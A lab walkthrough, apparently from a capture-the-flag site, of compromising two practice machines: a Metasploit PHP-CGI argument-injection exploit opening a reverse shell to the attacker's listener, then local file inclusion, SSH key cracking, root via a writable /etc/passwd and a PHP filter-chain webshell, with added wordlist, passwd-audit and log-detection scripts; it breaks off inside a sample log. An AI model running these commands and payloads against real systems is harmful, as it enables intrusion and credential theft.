[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > show options
Module options (exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /php-cgi/php-cgi.exe yes The path to a PHP CGI endpoint
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.136.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows PHP
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set payload
payload => php/meterpreter/reverse_tcp
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set payload
payload => php/meterpreter/reverse_tcp
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set payload php/reverse_php
payload => php/reverse_php
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > show options
Module options (exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /php-cgi/php-cgi.exe yes The path to a PHP CGI endpoint
VHOST no HTTP server virtual host
Payload options (php/reverse_php):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.136.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows PHP
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set rhosts 192.168.136.134
rhosts => 192.168.136.134
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > run
[*] Started reverse TCP handler on 192.168.136.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Apache
[*] Command shell session 1 opened (192.168.136.128:4444 -> 192.168.136.134:49741) at 2025-02-26 21:19:33 -0500
Use it directly
whoami
dir
cd ..
cd ..
dir
cd Users
dir
cd Administrator
dir
cd Desktop
dir
type user.txt
type root.txt
4dcd00d9b6c66a0eae4a30aa0c781406
af70e9322a562983e01a250ca84fe28d
p4l4nc4
Information gathering
The MAC address is 08:00:27:6a:2f:23 and the IP address is 192.168.56.107. Check the ports
┌──(root㉿kali-plus)-[~]
└─# nmap -p- 192.168.56.107
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-04 15:23 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.107
Host is up (0.0055s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:6A:2F:23 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 13.89 seconds
Ports 22 and 80 are open. Look at port 80 first: it is a web service. dirsearch finds a robots.txt, but I have no idea what it says
Port 80: user flag
┌──(root㉿kali-plus)-[~]
└─# curl 192.168.56.107:80/robots.txt
A palanca-negra-gigante é uma subespécie de palanca-negra. De todas as subespécies, esta destaca-se pelo grande tamanho, sendo um dos ungulados africanos mais raros. Esta subespécie é endémica de Angola, apenas existindo em dois locais, o Parque Nacional de Cangandala e a Reserva Natural Integral de Luando. Em 2002, após a Guerra Civil Angolana, pouco se conhecia sobre a sobrevivência de múltiplas espécies em Angola e, de facto, receava-se que a Palanca Negra Gigante tivesse desaparecido. Em janeiro de 2004, um grupo do Centro de Estudos e Investigação CientÃfica da Universidade Católica de Angola, liderado pelo Dr. Pedro vaz Pinto, obteve as primeiras evidências fotográficas do único rebanho que restava no Parque Nacional de Cangandala, ao sul de Malanje, confirmando-se assim a persistência da população após um duro perÃodo de guerra.
Atualmente, a Palanca Negra Gigante é considerada como o sÃmbolo nacional de Angola, sendo motivo de orgulho para o povo angolano. Como prova disso, a seleção de futebol angolana é denominada de palancas-negras e a companhia aérea angolana, TAAG, tem este antÃlope como sÃmbolo. Palanca é também o nome de uma das subdivisões da cidade de Luanda, capital de Angola. Na mitologia africana, assim como outros antÃlopes, eles simbolizam vivacidade, velocidade, beleza e nitidez visual
┌──(root㉿kali-plus)-[~]
└─# curl 192.168.56.107:80/robots.txt > tmp1
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1432 100 1432 0 0 225k 0 --:--:-- --:--:-- --:--:-- 233k
┌──(root㉿kali-plus)-[~]
└─# cat tmp1
A palanca-negra-gigante é uma subespécie de palanca-negra. De todas as subespécies, esta destaca-se pelo grande tamanho, sendo um dos ungulados africanos mais raros. Esta subespécie é endémica de Angola, apenas existindo em dois locais, o Parque Nacional de Cangandala e a Reserva Natural Integral de Luando. Em 2002, após a Guerra Civil Angolana, pouco se conhecia sobre a sobrevivência de múltiplas espécies em Angola e, de facto, receava-se que a Palanca Negra Gigante tivesse desaparecido. Em janeiro de 2004, um grupo do Centro de Estudos e Investigação CientÃfica da Universidade Católica de Angola, liderado pelo Dr. Pedro vaz Pinto, obteve as primeiras evidências fotográficas do único rebanho que restava no Parque Nacional de Cangandala, ao sul de Malanje, confirmando-se assim a persistência da população após um duro perÃodo de guerra.
Atualmente, a Palanca Negra Gigante é considerada como o sÃmbolo nacional de Angola, sendo motivo de orgulho para o povo angolano. Como prova disso, a seleção de futebol angolana é denominada de palancas-negras e a companhia aérea angolana, TAAG, tem este antÃlope como sÃmbolo. Palanca é também o nome de uma das subdivisões da cidade de Luanda, capital de Angola. Na mitologia africana, assim como outros antÃlopes, eles simbolizam vivacidade, velocidade, beleza e nitidez visual
Yet another approach I'd never seen; my brain is itching
┌──(root㉿kali-plus)-[~]
└─# cat tmp1|grep -P '\w+'
A palanca-negra-gigante é uma subespécie de palanca-negra. De todas as subespécies, esta destaca-se pelo grande tamanho, sendo um dos ungulados africanos mais raros. Esta subespécie é endémica de Angola, apenas existindo e dois locais, o Parque Nacional de Cangandala e a Reserva Natural Integral de Luando. Em 2002, após a Guerra Civil Angolana, pouco se conhecia sobre a sobrevivência de múltiplas espécies em Angola e, de facto, receava-se quea Palanca Negra Gigante tivesse desaparecido. Em janeiro de 2004, um grupo do Centro de Estudos e Investigação CientÃfica da Universidade Católica de Angola, liderado pelo Dr. Pedro vaz Pinto, obteve as primeiras evidênciasfotográficas do único rebanho que restava no Parque Nacional de Cangandala, ao sul de Malanje, confirmando-se assim a persistência da população após um duro perÃodo de guerra.
Atualmente, a Palanca Negra Gigante é considerada como o sÃmbolo nacional de Angola, sendo motivo de orgulho para o povo angolano. Como prova disso, a seleção de futebol angolana é denominada de palancas-negras e a companhi aérea angolana, TAAG, tem este antÃlope como sÃmbolo. Palanca é também o nome de uma das subdivisões da cidade de Luanda, capital de Angola. Na mitologia africana, assim como outros antÃlopes, eles simbolizam vivacidade,velocidade, beleza e nitidez visual
┌──(root㉿kali-plus)-[~]
└─# cat tmp1|grep -P '\w+' -o
In cat tmp1|grep -P '\w+', -P enables Perl-compatible regular expressions (PCRE) and '\w+' is the regex that matches one or more word characters. The effect is to pick out the numbers, letters and words made of letters, digits and underscores; visually they still appear separated by spaces. The commands below are:
cat tmp1|grep -P '\w+' -o
cat tmp1|grep -P '\w+' -o|sort
cat tmp1|grep -P '\w+' -o|sort|uniq
In cat tmp1|grep -P '\w+' -o, -o prints only the matched parts, one per line, so the output becomes a vertical list; cat tmp1|grep -P '\w+' -o|sort then simply sorts them, and cat tmp1|grep -P '\w+' -o|sort|uniq removes duplicates. Next we still have to generate the variant wordlist, the classic CTF leetspeak substitutions, for example
i->1
a->4
e->3
l->1
You can use a website for the conversion, but websites are not very reliable; it is better to have an AI do it or do it by hand. The manual command is:
cat tmp2|sed -re 's/a/4/gi' -e 's/e/3/gi' -re 's/i|l/1/g'
Then save the converted output as a txt wordlist and run it with gobuster
┌──(root㉿kali-plus)-[~]
└─# gobuster dir -w a.txt -u http://192.168.56.107 -x.php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.107
[+] Method: GET
[+] Threads: 10
[+] Wordlist: a.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/n3gr4 (Status: 301) [Size: 316] [--> http://192.168.56.107/n3gr4/]
Progress: 298 / 300 (99.33%)
===============================================================
Finished
===============================================================
That found a /n3gr4 directory. Appending it to the URL and scanning again found nothing; a closer look showed the case needed converting, so use cat a.txt|tr A-Z a-z > b.txt to lowercase the wordlist and run gobuster again
At this step I still got nothing. On checking, I found I had used kimi to convert the variant wordlist and what it gave me was wrong; speechless, kimi is useless. So let's generate a new wordlist directly with the commands
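The whole pipeline above (grep -P '\w+' -o | sort | uniq, the sed leet substitutions, then tr A-Z a-z) as one script, so the conversion does not depend on an AI getting it right. This is an added example, not code from the writeup; SAMPLE_TEXT is a constructed fragment standing in for tmp1, and write_wordlist is an assumed helper name. It also shows why leet-renamed paths such as n3gr4 are no protection: anyone with the page text can regenerate them mechanically.

```python
import re

# Constructed sample text standing in for the page's tmp1 (a fragment in the
# same style as the target's Portuguese page); it is not the box's real content.
SAMPLE_TEXT = """A palanca-negra-gigante é uma subespécie de palanca-negra.
Obteve as primeiras evidências do rebanho ao sul de Malanje."""


def extract_words(text):
    """Equivalent of grep -P '\\w+' -o | sort | uniq: every run of word
    characters, deduplicated and sorted."""
    return sorted(set(re.findall(r"\w+", text)))


def leet(word):
    """Mirror of the page's sed chain:
    s/a/4/gi and s/e/3/gi (case-insensitive), then s/i|l/1/g (lowercase only)."""
    word = re.sub(r"a", "4", word, flags=re.IGNORECASE)
    word = re.sub(r"e", "3", word, flags=re.IGNORECASE)
    word = re.sub(r"i|l", "1", word)
    return word


def build_wordlist(text):
    """Plain words plus their leet variants, all lowercased (the tr A-Z a-z
    step the page applies before the second gobuster run)."""
    variants = set()
    for word in extract_words(text):
        variants.add(word.lower())
        variants.add(leet(word).lower())
    return sorted(variants)


def write_wordlist(text, path):
    """Save one candidate per line, the format gobuster -w expects."""
    words = build_wordlist(text)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(words) + "\n")
    return len(words)


if __name__ == "__main__":
    for candidate in build_wordlist(SAMPLE_TEXT):
        print(candidate)
```

With the real page text in place of SAMPLE_TEXT, the list contains both n3gr4 (from "negra") and m414nj3 (from "Malanje"), the two names gobuster found.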
┌──(root㉿kali-plus)-[~]
└─# gobuster dir -w b1.txt -u http://192.168.56.107/n3gr4/ -x.php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.107/n3gr4/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: b1.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/m414nj3.php (Status: 500) [Size: 0]
===============================================================
Finished
===============================================================
That turned up a new page, http://192.168.56.107/n3gr4/m414nj3.php; next use wfuzz for web fuzzing
Command: wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://192.168.56.107/n3gr4/m414nj3.php?FUZZ=/etc/passwd --hh 0, where --hh 0 hides responses whose length is 0, i.e. those that return no content
┌──(root㉿kali-plus)-[~]
└─# wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://192.168.56.107/n3gr4/m414nj3.php?FUZZ=/etc/passwd --hh 0
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.107/n3gr4/m414nj3.php?FUZZ=/etc/passwd
Total requests: 4744
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000003006: 200 22 L 26 W 1066 Ch "page"
Total time: 7.406691
Processed Requests: 4744
Filtered Requests: 4743
Requests/sec.: 640.5019
The fuzzing found the parameter page; let's access it
┌──(root㉿kali-plus)-[~]
└─# curl http://192.168.56.107/n3gr4/m414nj3.php?page=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
p4l4nc4:x:1000:1000:p4l4nc4,,,:/home/p4l4nc4:/bin/bash
The request came back successfully and revealed the users. I checked whether .bashrc can be read, and it can, so this should be an arbitrary file read
User flag - method 1
The user flag is usually at /home/<user>/user.txt; try reading it directly
http://192.168.56.107/n3gr4/m414nj3.php?page=/home/p4l4nc4/user.txt
HMV{6cfb952777b95ded50a5be3a4ee9417af7e6dcd1}
User flag read successfully
User flag - method 2
Try reading the SSH key /home/p4l4nc4/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
Got the SSH login private key; first convert it into hash format with ssh2john: ssh2john hash3 >hash4
┌──(root㉿kali-plus)-[~]
└─# ssh2john hash3 > hash4
┌──(root㉿kali-plus)-[~]
└─# john hash4 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
friendster (hash3)
1g 0:00:00:04 DONE (2025-03-04 19:13) 0.2331g/s 149.1p/s 149.1c/s 149.1C/s hockey..pebbles
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
The SSH password is friendster; with the password, just log in
┌──(root㉿kali-plus)-[~]
└─# ssh p4l4nc4@192.168.56.107
The authenticity of host '192.168.56.107 (192.168.56.107)' can't be established.
ED25519 key fingerprint is SHA256:F1H2S93bx6fgnjMCinI5RMZf/XIJS3u8KjLS15lO6rU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.107' (ED25519) to the list of known hosts.
p4l4nc4@192.168.56.107's password:
Linux 4ng014 6.1.0-27-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.115-1 (2024-11-01) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Nov 13 17:10:08 2024 from 192.168.1.78
p4l4nc4@4ng014:~$ ls
user.txt
p4l4nc4@4ng014:~$ cat user.txt
HMV{6cfb952777b95ded50a5be3a4ee9417af7e6dcd1}
Privilege escalation - root flag
Root flag - method 1
Looking at .bash_history shows /etc/passwd was made writable
ls /etc/passwd
ls -l /etc/passwd
sudo chmod rw-rw-rw- /etc/passwd
sudo chmod rwrwrw /etc/passwd
sudo chmod 666 /etc/passwd
/etc/passwd has write permission, so try writing a new user; first generate a password hash with openssl
p4l4nc4@4ng014:~$ openssl passwd 123456
$1$CUWhN2c.$XWgLjjrEAtb3CdDb6Vk5U0
Then append it to /etc/passwd with echo
p4l4nc4@4ng014:~$ echo 'hack:$1$CUWhN2c.$XWgLjjrEAtb3CdDb6Vk5U0:0:0:qwe:/root:/bin/bash' >> /etc/passwd
p4l4nc4@4ng014:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
p4l4nc4:x:1000:1000:p4l4nc4,,,:/home/p4l4nc4:/bin/bash
kn1ght::0:0:::/bin/bash
hack:$1$CUWhN2c.$XWgLjjrEAtb3CdDb6Vk5U0:0:0:qwe:/root:/bin/bash
p4l4nc4@4ng014:~$ su hack
Password:
root@4ng014:/home/p4l4nc4# ls
user.txt
root@4ng014:/home/p4l4nc4# cd /root
root@4ng014:~# ls
root.txt
root@4ng014:~# cat root.txt
HMV{4c3b9d0468240fbd4a9148c8559600fe2f9ad727}
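The listing above is exactly what a passwd audit should catch: a second UID-0 account, an entry with an empty password field (kn1ght), a hash stored inline instead of in /etc/shadow, and a file mode of 666. As an added example (not code from the writeup), the following script performs those checks; SAMPLE_PASSWD is a constructed excerpt that reproduces the notable lines from the session, and audit_file is an assumed helper that runs the same checks against a live file.

```python
import os
import stat

# Constructed /etc/passwd excerpt reproducing the notable entries from the
# session above (kn1ght with an empty password field, hack with an inline
# hash and UID 0) next to ordinary accounts; not a capture of a real host.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
p4l4nc4:x:1000:1000:p4l4nc4,,,:/home/p4l4nc4:/bin/bash
kn1ght::0:0:::/bin/bash
hack:$1$CUWhN2c.$XWgLjjrEAtb3CdDb6Vk5U0:0:0:qwe:/root:/bin/bash
"""

# Password-field values that mean "look in /etc/shadow" or "locked".
SHADOWED = {"x", "*", "!", "!!"}


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; malformed lines are kept and flagged."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            entries.append({"line": lineno, "name": fields[0], "malformed": True})
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"line": lineno, "name": name, "pw": pw, "uid": int(uid),
                        "gid": gid, "home": home, "shell": shell, "malformed": False})
    return entries


def audit_entries(entries):
    """Findings as (account, reason): a second UID-0 account, an empty
    password field (login without a password) or a hash stored in the
    world-readable passwd file instead of shadow."""
    findings = []
    for e in entries:
        if e["malformed"]:
            findings.append((e["name"], "malformed-line"))
            continue
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["name"], "extra-uid0"))
        if e["pw"] == "":
            findings.append((e["name"], "empty-password"))
        elif e["pw"] not in SHADOWED:
            findings.append((e["name"], "hash-in-passwd"))
    return findings


def audit_mode(mode):
    """Problems with a passwd file's st_mode: any write bit beyond the owner's
    lets a non-root user do what the sudo chmod 666 in the history allowed."""
    problems = []
    if mode & stat.S_IWGRP:
        problems.append("group-writable")
    if mode & stat.S_IWOTH:
        problems.append("world-writable")
    return problems


def audit_file(path="/etc/passwd"):
    """Run both checks against a real file (content plus permission bits)."""
    with open(path, encoding="utf-8") as fh:
        findings = audit_entries(parse_passwd(fh.read()))
    return findings + [("<file>", p) for p in audit_mode(os.stat(path).st_mode)]


if __name__ == "__main__":
    print(audit_entries(parse_passwd(SAMPLE_PASSWD)))
    print(audit_mode(0o666))
```

Run as a periodic check, a single "extra-uid0" or "world-writable" finding is enough to warrant an incident review; both are how this box is rooted.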
Root flag - method 2
Method 2 uses two tools, php_filter_chain_generator and linpeas.sh. Project addresses: https://github.com/synacktiv/php_filter_chain_generator
https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS
First use the PHP filter wrapper, http://192.168.56.107/n3gr4/m414nj3.php?page=php://filter/read=convert.base64-encode/resource=m414nj3.php, to read the source code
PD9waHAKICAgICRwYWdlID0gJF9HRVRbJ3BhZ2UnXTsKICAgIGluY2x1ZGUoJHBhZ2UpOwo/Pgo=
<?php
$page = $_GET['page'];
include($page);
?>
┌──(root㉿kali-plus)-[/home/test/Desktop/php_filter_chain_generator]
└─# python3 php_filter_chain_generator.py --chain "<?php system(\$_GET['a']);?>"
[+] The following gadget chain will generate the following code : <?php system($_GET['a']);?> (base64 value: PD9waHAgc3lzdGVtKCRfR0VUWydhJ10pOz8+)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp
With this chain in hand, use it directly: append &a=id to the URL to see the id. busybox wget can also be used to download the scripts
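Every request on this box, from the wfuzz parameter burst through page=/etc/passwd to the php://filter chain, leaves a distinctive trace in the web server's access log. The following detection script is an added example, not part of the writeup: it parses constructed Apache-style log lines modelled on those requests (IPs, timestamps and sizes are illustrative), labels query values that carry PHP wrappers, iconv filter chains, traversal or sensitive paths, and separately flags a client that hits one path with many different parameter names, which is what parameter fuzzing looks like from the server side.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache-style access-log lines modelled on the requests in this
# writeup (the fuzzing burst, the /etc/passwd read and the php://filter chain).
# The IPs, timestamps and sizes are illustrative, not captured from the box.
SAMPLE_LOG = """\
192.168.56.101 - - [04/Mar/2025:19:10:01 +0800] "GET /n3gr4/m414nj3.php?admin=/etc/passwd HTTP/1.1" 200 0 "-" "Wfuzz/3.1.0"
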